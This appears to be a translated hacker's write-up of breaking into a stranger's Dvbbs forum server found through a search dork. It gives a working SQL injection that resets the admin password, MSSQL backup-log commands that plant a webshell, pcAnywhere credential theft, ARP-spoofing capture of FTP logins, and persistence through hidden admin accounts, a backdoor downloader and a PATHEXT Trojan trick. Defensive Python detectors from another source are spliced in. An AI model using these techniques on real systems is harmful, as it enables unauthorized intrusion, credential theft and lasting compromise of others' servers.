This article is purely a summary of my own intrusion experience and has nothing deep in it. It is the first article I have written, so there will inevitably be some mistakes or nothing new in it. Please kindly advise!
Search Baidu for ckl inurl:asp and go through the results. As long as the site uses an MSSQL database, it has db_owner permission or above; at least I have not seen otherwise yet.
Of public and db_owner, db_owner has full operation rights on the currently connected database and can execute select, update, delete, create, drop and other commands.
Among the search results, find a Chinese website with db_owner permission. Looking at the website, I found it runs a Dvbbs 7.1 forum.
whois.webhosting.info shows there is one other website on the machine, so it should be a personal host. Telnetting to port 80 on the target showed IIS 5.0, so Windows 2000!
1. Obtain webshell.
There are two ideas. The first starts from the website itself.
First, by brute-forcing table names I found the user table that stores the Dvbbs users, then brute-forced the fields in that table to find the administrator's username and password. The password is MD5-hashed; at www.xmd5.org I found that the administrator had some security awareness and was not using a weak password. But we have db_owner permission, which can update. What is there to be afraid of! Directly at the injection point: www.target.com/list.id=1'{update [user] set password='49ba59abbe56e057' where id=1-, where 49ba59abbe56e057 is the MD5 of 123456. This changes the front-end administrator's password to 123456; in the same way the back-end administrator's password is also changed to 123456, and login succeeds. Now we can obtain a webshell by the database backup method.
As we all know, Dvbbs 7.1 cannot be backed up the old way: when obtaining a webshell, it checks whether the file being backed up is an mdb file, and if not, an error occurs! Upload from the front end (you can also use the copy command), note the address, and back it up to .asp; this succeeds, and the Ice Fox client connects successfully. Then upload a less common Trojan.
The second idea: direct differential backup. The method used here is the backup-log method recently released by swan.
Alter database XXXX set RECOVERY FULL
Backup log XXXX to disk = 'C:\sammy' with init
Create table cmd (a image)
Insert into cmd (a) values ('')
Backup log XXXX to disk = 'C:\xxx2.asp'
XXXX stands for the database name; the extra % is added for fault tolerance.
Use this method to get a webshell.
Now, of course, we look for a vulnerability to escalate privileges, and of course we think of Serv-U and pcAnywhere. Traces of pcAnywhere can be seen in the system service list. Entering C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere in the address bar, the .cif file can be obtained smoothly; use pcAnywhere PassView to get the username and password. If you log on with pcAnywhere, you can only be logging on as a member of the administrators group. Now look for a self-starting service program: a Rising antivirus program was found in the system service list, with path D:\PROGRAM; upload there and wait for the server to restart. I am patient. There are many methods of privilege escalation; do it yourself.
2. Intranet security
I have read many articles about ARP spoofing recently, so I will try it out. ping www.target.com gives the IP 1.1.1.2; scanning 1.1.1.0-1.1.1.255 with PortReady and using the once-popular MS05-039 gets a host 1.1.1.3, on which 3389 is enabled. Download the WinPcap driver (the driver the sniffer depends on), then download arpspoof (a sniffer); tracert shows that the gateway is 1.1.1.1. Let me explain the principle of ARP spoofing. ARP is the Address Resolution Protocol, which maps the OSI network layer (IP layer) to the data link layer (MAC). In a LAN, communication does not use IP addresses but physical addresses, that is, MACs. So we can perform evil spoofing: take three hosts A, B and C, where A is your machine, B is the host you want to spoof, and C is the gateway. We send an ARP reply to C saying "I am B" and giving C our MAC address, then spoof B saying "I am the gateway" and giving it our MAC address. Both are misled, and all data sent to B flows to A. This loads A's CPU and may crash A.
I personally think the proactive protection is to bind MAC to IP statically.
ArpSpoof is such a tool. Command format: ArpSpoof [Spoof IP1] [Spoof IP2] [Own IP]
On 1.1.1.3 run: arpspoof 1.1.1.1 1.1.1.2 1.1.1.3 21 c:\log.txt
Wait for the administrator to log on.
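As an added defensive example (not from the original article), a small check for the symptoms that the spoofing described above leaves in a victim's ARP cache: the gateway's MAC changing between two arp -a snapshots, and one MAC answering for several IPs. The two snapshots are constructed and reuse the article's 1.1.1.x addresses (gateway 1.1.1.1).

```python
"""Defensive check for the ARP-cache symptoms of the spoofing described
above. The two `arp -a` snapshots are constructed for this example and
reuse the article's 1.1.1.0/24 layout (gateway 1.1.1.1)."""
import re
from collections import defaultdict

# One Windows `arp -a` entry: IP address, dash-separated MAC, entry type
ARP_LINE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\s+([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)"
)


def parse_arp_table(text):
    """Return {ip: mac} for every entry in an `arp -a` dump (MACs lowercased)."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def spoof_indicators(before, after, gateway_ip):
    """Compare two snapshots and report the two classic signs of ARP spoofing:
    the gateway's MAC changing, and one MAC claiming more than one IP."""
    findings = []
    old, new = before.get(gateway_ip), after.get(gateway_ip)
    if old and new and old != new:
        findings.append(f"gateway {gateway_ip} MAC changed {old} -> {new}")
    ips_by_mac = defaultdict(list)
    for ip, mac in after.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in ips_by_mac.items():
        if len(ips) > 1:
            findings.append(f"MAC {mac} answers for {', '.join(sorted(ips))}")
    return findings


# Constructed snapshots: in the second one, the gateway and every other host
# resolve to the MAC that previously belonged only to 1.1.1.3.
BEFORE = """Interface: 1.1.1.4 --- 0x2
  Internet Address      Physical Address      Type
  1.1.1.1               00-aa-bb-cc-dd-01     dynamic
  1.1.1.2               00-aa-bb-cc-dd-02     dynamic
  1.1.1.3               00-aa-bb-cc-dd-03     dynamic
"""
AFTER = BEFORE.replace("dd-01", "dd-03").replace("dd-02", "dd-03")

if __name__ == "__main__":
    for finding in spoof_indicators(parse_arp_table(BEFORE), parse_arp_table(AFTER), "1.1.1.1"):
        print("ALERT:", finding)
```

On a real host, feed the output of two arp -a runs taken a few seconds apart; a static MAC/IP binding, as the article suggests, is what stops the second snapshot from changing in the first place.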
3. Holding on to bots
Having worked this hard, you must protect it well. We can exploit the folder creation vulnerability. For example, if there is a folder named a, go to that path in cmd and enter mkdir a...\ ; this creates a folder a... which, when opened, points to the folder a. So we can put an ASP Trojan inside and then point NetBox at it. This ASP Trojan has SYSTEM permission: when we access the ASP Trojan through www.target.com/a..., we also have SYSTEM. So this method can be used to fend off all attacks.
Net user jouanc$ 123456 /add
Net localgroup administrators jouanc$ /add. Save these as 1.vbs and put it in the C:\winnt\system32\GroupPolicy\Machine\Scripts\Startup directory.
Net user jouanc$ /del is saved as 2.vbs and placed in C:\winnt\system32\GroupPolicy\Machine\Scripts\Shutdown.
Save the following as scripts.ini and put it in C:\winnt\system32\GroupPolicy\Machine\Scripts:
[Startup]
0CmdLine=1.vbs
0Parameters=
[Shutdown]
0CmdLine=2.vbs
0Parameters=
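An added audit check, not part of the original article, for the machine Group Policy script hook used above: it parses scripts.ini into its Startup/Shutdown entries and, on a live system, reports whether each referenced script actually exists under the phase directory. The INI text is constructed; the directory path is the Windows 2000 default from the article.

```python
"""Audit the machine Group Policy script hook above: parse scripts.ini and
list every Startup/Shutdown entry. CONSTRUCTED_INI is made up for this
example; audit_scripts_ini() reads the live file."""
import configparser
import os

# Default location on the Windows 2000 host discussed in the article
SCRIPTS_DIR = r"C:\winnt\system32\GroupPolicy\Machine\Scripts"


def parse_scripts_ini(text):
    """Return [(phase, index, cmdline, parameters), ...] in execution order.
    Keys are numbered 0CmdLine/0Parameters, 1CmdLine/1Parameters, ..."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep key case, e.g. '0CmdLine'
    cp.read_string(text)
    entries = []
    for phase in ("Startup", "Shutdown"):
        if not cp.has_section(phase):
            continue
        sec = cp[phase]
        idx = 0
        while f"{idx}CmdLine" in sec:
            entries.append((phase, idx, sec[f"{idx}CmdLine"], sec.get(f"{idx}Parameters", "")))
            idx += 1
    return entries


def audit_scripts_ini(scripts_dir=SCRIPTS_DIR):
    """Read the live scripts.ini (UTF-16 with BOM, or ANSI) and return each
    entry plus whether its script exists under <scripts_dir>\\<phase>."""
    path = os.path.join(scripts_dir, "scripts.ini")
    if not os.path.isfile(path):
        return []
    with open(path, "rb") as fh:
        raw = fh.read()
    text = raw.decode("utf-16") if raw.startswith(b"\xff\xfe") else raw.decode("latin-1")
    return [(phase, cmd, params, os.path.isfile(os.path.join(scripts_dir, phase, cmd)))
            for phase, _idx, cmd, params in parse_scripts_ini(text)]


CONSTRUCTED_INI = """[Startup]
0CmdLine=1.vbs
0Parameters=
[Shutdown]
0CmdLine=2.vbs
0Parameters=
"""

if __name__ == "__main__":
    for entry in parse_scripts_ini(CONSTRUCTED_INI):
        print(entry)
```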
I have another idea: write a VBS that downloads things from the Internet, equivalent to a downloader, and have it download our configured backdoor from our own web space.
Then use a bat with if to determine whether the webshell was downloaded, and goto to run it. Bind the two together and put them in Startup.
Put a bat that deletes "our Trojan" in Shutdown. This needs IE to be openable; on some bots I have been on, IE had to be set up before it would work.
Another trick: enter set in cmd.
Two of the lines are:
Path=D:\WINNT\system32;D:\WINNT;D:\WINNT\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
As you know, .com has the highest priority, so we can put a www.google.com in D:\WINNT\system32 (note that "www.google.com" is our Trojan), haha. When the bot's owner opens IE and enters www.google.com, IE will find our Trojan first,
unless they enter "http://www.google.com".
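An added defensive check, not part of the original article, for the PATHEXT trick just described: it mimics the shell's extension search order (so .com shadows .exe for the same name) and scans PATH directories for executables whose name looks like a hostname, such as www.google.com. The directory listing and PATHEXT value below are constructed; scan_path_dirs() runs the same check on a live system.

```python
"""Audit PATH directories for hostname-shaped executables such as
'www.google.com'. The system32 listing below is constructed for this example."""
import os
import re

# A stem that looks like a DNS name: at least two dot-separated labels
HOSTNAME_LIKE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$", re.IGNORECASE)


def parse_pathext(pathext):
    """'.COM;.EXE;...' -> ['.com', '.exe', ...], preserving search order."""
    return [e.strip().lower() for e in pathext.split(";") if e.strip()]


def resolve_first(command, filenames, exts):
    """Mimic the shell lookup: the first PATHEXT extension present for
    `command` wins, so 'foo.com' shadows 'foo.exe' in the same directory."""
    present = {n.lower() for n in filenames}
    for ext in exts:
        if command.lower() + ext in present:
            return command + ext
    return None


def suspicious_names(filenames, exts):
    """Files whose extension is executable under PATHEXT and whose stem
    (the part before that extension) still looks like a hostname."""
    hits = []
    for name in filenames:
        stem, ext = os.path.splitext(name)
        if ext.lower() in exts and HOSTNAME_LIKE.match(stem):
            hits.append(name)
    return hits


def scan_path_dirs(path_value, pathext_value):
    """Apply suspicious_names() to every existing directory in a PATH value."""
    exts = parse_pathext(pathext_value)
    found = {}
    for d in path_value.split(os.pathsep):
        if os.path.isdir(d):
            hits = suspicious_names(os.listdir(d), exts)
            if hits:
                found[d] = hits
    return found


# Constructed listing of a system32 directory with two planted files
SYSTEM32 = ["cmd.exe", "notepad.exe", "www.google.com", "ping.exe", "mail.example.net.bat"]
PATHEXT_VALUE = ".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH"

if __name__ == "__main__":
    print(suspicious_names(SYSTEM32, parse_pathext(PATHEXT_VALUE)))
    print(scan_path_dirs(os.environ.get("PATH", ""), os.environ.get("PATHEXT", PATHEXT_VALUE)))
```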
In fact, there are many methods for holding bots. I like this one very much: it will not be killed, and it can hold on to the bots.